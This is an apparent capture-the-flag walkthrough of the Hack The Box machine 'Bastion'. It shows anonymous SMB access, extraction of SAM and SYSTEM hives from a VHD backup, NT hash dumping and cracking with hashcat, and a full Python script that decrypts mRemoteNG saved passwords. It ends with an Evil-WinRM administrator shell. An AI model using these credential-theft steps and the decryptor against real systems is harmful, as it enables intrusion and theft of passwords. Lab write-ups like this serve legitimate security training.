Rustscan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg=
| 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-02-04T02:08:35+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-04T01:08:34
|_ start_date: 2025-02-04T00:37:11
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 26941/tcp): CLEAN (Couldn't connect)
| Check 2 (port 38727/tcp): CLEAN (Couldn't connect)
| Check 3 (port 18741/udp): CLEAN (Timeout)
| Check 4 (port 26560/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m53s, deviation: 34m35s, median: 3s
SMB Share
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ smbclient -L \\\\bastion.htb\\
Password for [WORKGROUP\jimmy]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to bastion.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ smbclient \\\\bastion.htb\\Backups -U " "
Password for [WORKGROUP\ ]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
5638911 blocks of size 4096. 1172156 blocks available
smb: \>
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow
Mount Share
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ mount -t cifs //bastion.htb/backups /mnt/smb_share
mount.cifs: permission denied: no match for /mnt/smb_share found in /etc/fstab
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ sudo mount -t cifs //bastion.htb/backups /mnt/smb_share
Password for root@//bastion.htb/backups:
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ cd /mnt/smb_share
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ ls
note.txt SDT65CB.tmp WindowsImageBackup
┌──(jimmy㉿kali)-[/mnt/smb_share]
└─$ ll
total 1
-r-xr-xr-x 1 root root 116 Apr 16 2019 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 2019 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 2019 WindowsImageBackup
Enumerate Windows Image Backup
- Found VHD files under WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
- The VHD file 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is the system image, so the SAM and SYSTEM hives can be pulled from it
- Used 7z to extract only those two files straight from the mounted share, rather than copying the whole image over the VPN as the note asks
┌──(jimmy㉿kali)-[/mnt/smb_share/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─$ 7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd Windows/System32/config/SAM -o/home/jimmy/HTB/rooms/bastion
┌──(jimmy㉿kali)-[/mnt/smb_share/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
└─$ 7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd Windows/System32/config/SYSTEM -o/home/jimmy/HTB/rooms/bastion
Used samdump2 to dump the NT hashes from the extracted hives
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Hashcat
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
26112010952d963c8dc4217daec986d9:bureaulampje
The server has OpenSSH installed, so I used the cracked password to SSH in as the L4mpje user
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>
User Flag
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\Desktop
22-02-2019 15:27 <DIR> .
22-02-2019 15:27 <DIR> ..
04-02-2025 01:37 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.800.647.168 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
18e2668bbcfd5db7c1e7c383a50efb47
A remote connection manager called mRemoteNG was installed on the server
- I started to dig around and found its config file, confCons.xml, which stores connection entries with usernames and passwords
- The passwords were base64 encoded; decoding one gave a hex-looking blob rather than a plaintext password
- I did some research and found a Python script that parses confCons.xml and decrypts those blobs
- I copied confCons.xml into the Backups share and then pulled it down to my local machine over the mounted share
l4mpje@BASTION C:\Users\L4mpje>cd AppData\Roaming\mRemoteNG
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>dir
Volume Serial Number is 1B7D-E692
D 6.316 confCons.xml
22-02-2019 14:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 14:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 14:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 14:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 14:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 14:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 14:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 14:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 14:03 51 extApps.xml
22-02-2019 14:03 5.217 mRemoteNG.log
22-02-2019 14:03 2.245 pnlLayout.xml
22-02-2019 14:01 <DIR> Themes
14 File(s) 76.577 bytes
3 Dir(s) 4.824.895.488 bytes free
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>copy confCons.xml C:\Backups
1 file(s) copied.
Python script
#!/usr/bin/env python3
# Decrypts the Password="..." attributes of an mRemoteNG confCons.xml.
# Each blob is base64(salt(16) | nonce(16) | ciphertext | GCM tag(16)); the AES-256 key is
# PBKDF2-HMAC-SHA1 over the master password ("mR3m" unless the user changed it), 1000 rounds.
import base64
import binascii
import hashlib
import re
import sys
from Cryptodome.Cipher import AES

if len(sys.argv) != 2:
    print(f"[-] Usage: {sys.argv[0]} [confCons.xml]")
    sys.exit(1)

# Read the configuration file
try:
    with open(sys.argv[1], 'r', encoding="utf-8") as f:
        conf = f.read()
except FileNotFoundError:
    print(f"[-] Unable to open {sys.argv[1]}")
    sys.exit(1)

# Extract BlockCipherMode
mode_match = re.findall(r'BlockCipherMode="(\w+)"', conf)
if not mode_match:
    print("[-] Warning - No BlockCipherMode detected")
elif mode_match[0] != 'GCM':
    print(f"[-] Warning - This script is for AES GCM Mode. {mode_match[0]} detected")

# Extract nodes
nodes = re.findall(r'<Node .+?/>', conf)
if nodes:
    print(f"[+] Found nodes: {len(nodes)}\n")
else:
    print("[-] Found no nodes")
    sys.exit(1)

# Process each node
for node in nodes:
    user = "(No Username)"
    try:
        user_match = re.search(r' Username="([^"]*)"', node)
        if user_match:
            user = user_match.group(1)
        password_match = re.search(r' Password="([^"]+)"', node)
        if not password_match:
            print(f"[-] No Password found for user: {user}")
            continue
        enc = base64.b64decode(password_match.group(1))
        # Ensure encrypted data is valid (minimum 48 bytes: salt(16) + nonce(16) + tag(16))
        if len(enc) < 48:
            print(f"[-] Skipping invalid encrypted data for user: {user}")
            continue
        salt, nonce, cipher, tag = enc[:16], enc[16:32], enc[32:-16], enc[-16:]
        # Key derived from the default master password "mR3m"
        key = hashlib.pbkdf2_hmac("sha1", b"mR3m", salt, 1000, dklen=32)
        aes = AES.new(key, AES.MODE_GCM, nonce=nonce)
        aes.update(salt)  # the salt doubles as the GCM associated data
        # Proper decryption with authentication
        password = aes.decrypt_and_verify(cipher, tag).decode()
        print(f"Username: {user}\nPassword: {password}\n")
    except (ValueError, IndexError, binascii.Error) as e:
        print(f"[-] Error processing node for user {user}: {str(e)}")
    except Exception as e:
        print(f"[-] Unexpected error for user {user}: {str(e)}")
Decrypted passwords
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ python3 mremoteng_decode.py confCons.xml
[+] Found nodes: 2
Username: Administrator
Password: thXLHM96BeKL0ER2
Username: L4mpje
Password: bureaulampje
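To make the weakness concrete from the defender's side, here is an added example (my own code, not the decode script above and not mRemoteNG's code) that rebuilds the same blob format, so a confCons.xml can be audited for entries still protected only by the default master password "mR3m". It assumes either the cryptography package or pycryptodome(x) is installed; the passwords it seals are the ones from this walkthrough, used as constructed sample input.

```python
import base64
import hashlib
import os

try:  # prefer the 'cryptography' package; fall back to pycryptodome(x), which the decode script uses
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _seal(key, nonce, aad, plaintext):
        return AESGCM(key).encrypt(nonce, plaintext, aad)      # ciphertext || 16-byte tag

    def _open(key, nonce, aad, ct_and_tag):
        return AESGCM(key).decrypt(nonce, ct_and_tag, aad)     # raises InvalidTag on failure
except ImportError:
    from Cryptodome.Cipher import AES

    def _seal(key, nonce, aad, plaintext):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce)
        c.update(aad)
        return b"".join(c.encrypt_and_digest(plaintext))

    def _open(key, nonce, aad, ct_and_tag):
        c = AES.new(key, AES.MODE_GCM, nonce=nonce)
        c.update(aad)
        return c.decrypt_and_verify(ct_and_tag[:-16], ct_and_tag[-16:])  # ValueError on bad tag

DEFAULT_MASTER = "mR3m"   # mRemoteNG's built-in master password when the user never sets one
ITERATIONS = 1000         # PBKDF2 rounds used by mRemoteNG

def derive_key(master, salt):
    """PBKDF2-HMAC-SHA1, 32-byte AES-256 key: the same derivation the decode script performs."""
    return hashlib.pbkdf2_hmac("sha1", master.encode(), salt, ITERATIONS, dklen=32)

def encrypt_password(plain, master=DEFAULT_MASTER, salt=None, nonce=None):
    """Build a confCons.xml Password= value: base64(salt | nonce | ciphertext | tag), salt as AAD."""
    salt = salt or os.urandom(16)
    nonce = nonce or os.urandom(16)
    sealed = _seal(derive_key(master, salt), nonce, salt, plain.encode())
    return base64.b64encode(salt + nonce + sealed).decode()

def decrypt_password(blob, master):
    """Return the plaintext, or None when the tag check fails (wrong master password or tampered blob)."""
    try:
        enc = base64.b64decode(blob)
        if len(enc) < 48:                   # salt + nonce + tag is the minimum
            return None
        salt, nonce, ct_and_tag = enc[:16], enc[16:32], enc[32:]
        return _open(derive_key(master, salt), nonce, salt, ct_and_tag).decode()
    except Exception:                       # bad base64, InvalidTag or ValueError from either backend
        return None

def protected_only_by_default_master(blob):
    """Audit check: True when the blob opens under "mR3m", so anyone who can read the file can read it."""
    return decrypt_password(blob, DEFAULT_MASTER) is not None
```

An entry that opens under "mR3m" is readable by anyone who obtains the file, which is exactly what happened here; with a per-file master password set in mRemoteNG the same check returns False and the decode script fails its tag verification.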
Used Evil-WinRM to get a remote shell as Administrator with the recovered password
┌──(jimmy㉿kali)-[~/HTB/rooms/bastion]
└─$ evil-winrm -i 10.10.10.134 -u 'administrator' -p 'thXLHM96BeKL0ER2'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/6/2025 3:11 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
2202715d3cb6acc1ddae742e20859c33
*Evil-WinRM* PS C:\Users\Administrator\Desktop>